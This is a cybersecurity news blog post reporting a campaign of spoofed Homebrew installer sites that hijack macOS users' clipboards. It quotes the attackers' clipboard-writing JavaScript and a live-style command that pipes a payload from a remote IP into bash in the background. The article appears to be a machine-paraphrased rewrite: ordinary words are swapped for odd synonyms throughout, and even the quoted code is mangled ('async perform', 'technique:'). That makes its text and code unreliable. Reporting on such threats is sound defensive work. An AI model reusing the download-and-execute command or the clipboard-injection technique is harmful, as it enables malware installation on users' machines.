Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Hackers Attacking macOS Users With Spoofed Homebrew Websites to Inject Malicious Payloads

Posted on October 14, 2025October 14, 2025 By CWS

A complicated marketing campaign focusing on macOS customers has emerged via spoofed Homebrew installer web sites that ship malicious payloads alongside reputable bundle supervisor installations.

The assault exploits the widespread belief customers place within the fashionable Homebrew bundle supervisor by creating pixel-perfect replicas of the official brew[.]sh set up web page, full with misleading clipboard manipulation methods.

Safety researchers have recognized a number of fraudulent domains mimicking the reputable Homebrew web site, together with homebrewfaq[.]org, homebrewclubs[.]org, and homebrewupdate[.]org.

These malicious websites current convincing replicas of the official set up interface however incorporate hidden JavaScript designed to inject extra instructions into customers’ clipboards with out their information.

Not like genuine Homebrew pages that enable handbook textual content choice, these spoofed variations drive customers to make the most of a delegated Copy button, enabling attackers to insert malicious payloads alongside commonplace set up instructions.

Homebrew set up web page (Supply – The Sequence)

The marketing campaign represents a major evolution in provide chain assaults, focusing on not the bundle repositories themselves however the preliminary set up course of.

Whereas Homebrew has maintained a powerful safety monitor document with no current compromises, menace actors have found an efficient workaround by impersonating the trusted set up supply.

Spoofed Homebrew set up web page (Supply – The Sequence)

The Sequence analysts recognized this rising menace sample via systematic monitoring of suspicious domains and infrastructure related to identified malware distribution networks.

The assault methodology demonstrates outstanding sophistication in its execution and evasion capabilities.

Quite than compromising reputable bundle repositories, attackers have developed a parallel infrastructure that intercepts customers through the crucial set up section.

This strategy bypasses conventional safety measures centered on repository monitoring whereas exploiting the inherent belief customers place in acquainted set up procedures.

Superior Clipboard Manipulation Strategies

The core an infection mechanism depends on JavaScript-based clipboard manipulation that operates transparently to the sufferer.

When customers click on the Copy button on spoofed websites, embedded code executes a collection of operations designed to inject malicious instructions alongside the anticipated Homebrew set up script.

The JavaScript implementation consists of Russian-language feedback explicitly indicating the place malicious instructions ought to be inserted, suggesting a commodity-style menace service.

The malicious script prevents commonplace textual content choice via occasion listeners that disable contextmenu, selectstart, copy, minimize, and dragstart operations on the set up block.

This forces victims to make use of the supplied Copy button, which triggers the copyInstallCommand() perform. The perform writes a predetermined command to the clipboard utilizing both the trendy Clipboard API or fallback textarea strategies for compatibility throughout completely different browser environments.

const copyCommand = ‘echo ‘; // ← замени на нужную
async perform copyInstallCommand () {
await navigator[.]clipboard[.]writeText (copyCommand);
fetch (‘notify[.]php’, {
technique: ‘POST’,
headers: { ‘Content material-Kind’: ‘utility / json’ },
physique: JSON[.]stringify ({ occasion: ‘copy_install_command’, time: new Date () })
});
}

Evaluation revealed that lively campaigns make the most of instructions reminiscent of curl – s http[:]//185[.]93[.]89[.]62/d/vipx69930 | nohup bash & which downloads and executes extra payloads within the background whereas the reputable Homebrew set up proceeds usually, creating an efficient dual-execution situation that maintains operational stealth whereas establishing persistent entry to compromised techniques.

Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:Attacking, Hackers, Homebrew, Inject, macOS, Malicious, Payloads, Spoofed, Users, Websites

Post navigation

Previous Post: Researchers Expose TA585’s MonsterV2 Malware Capabilities and Attack Chain
Next Post: Russian Cybercrime Market Hub Transferring from RDP Access to Malware Stealer Logs to Access

Related Posts

Lazarus Hackers Trick Users Into Believing Their Camera or Microphone is Blocked to Deliver PyLangGhost RAT Cyber Security News
Elite Cyber Veterans Launch Blast Security with $10M to Turn Cloud Detection into Prevention Cyber Security News
CISA Releases Four ICS Advisories Surrounding Vulnerabilities, and Exploits Cyber Security News
22.2 Tbps DDoS Attack Breaks Internet With New World Record Cyber Security News
Threat Actors Attacking Fans and Teams of Belgian Grand Prix With Phishing Campaigns Cyber Security News
Red Hat Data Breach – Threat Actors Claim Breach of 28K Private GitHub Repositories Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Hackers Registered 18,000 Holiday-Themed Domains Targeting ‘Christmas,’ ‘Black Friday,’ and ‘Flash Sale’
  • Why Organizations Are Turning to RPAM
  • In Other News: HashJack AI Browser Attack, Charming Kitten Leak, Hacker Unmasked
  • Handala Hacker Group Attacking Israeli High-Tech and Aerospace Professionals
  • MS Teams Guest Access Can Remove Defender Protection When Users Join External Tenants

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Hackers Registered 18,000 Holiday-Themed Domains Targeting ‘Christmas,’ ‘Black Friday,’ and ‘Flash Sale’
  • Why Organizations Are Turning to RPAM
  • In Other News: HashJack AI Browser Attack, Charming Kitten Leak, Hacker Unmasked
  • Handala Hacker Group Attacking Israeli High-Tech and Aerospace Professionals
  • MS Teams Guest Access Can Remove Defender Protection When Users Join External Tenants

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2025 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark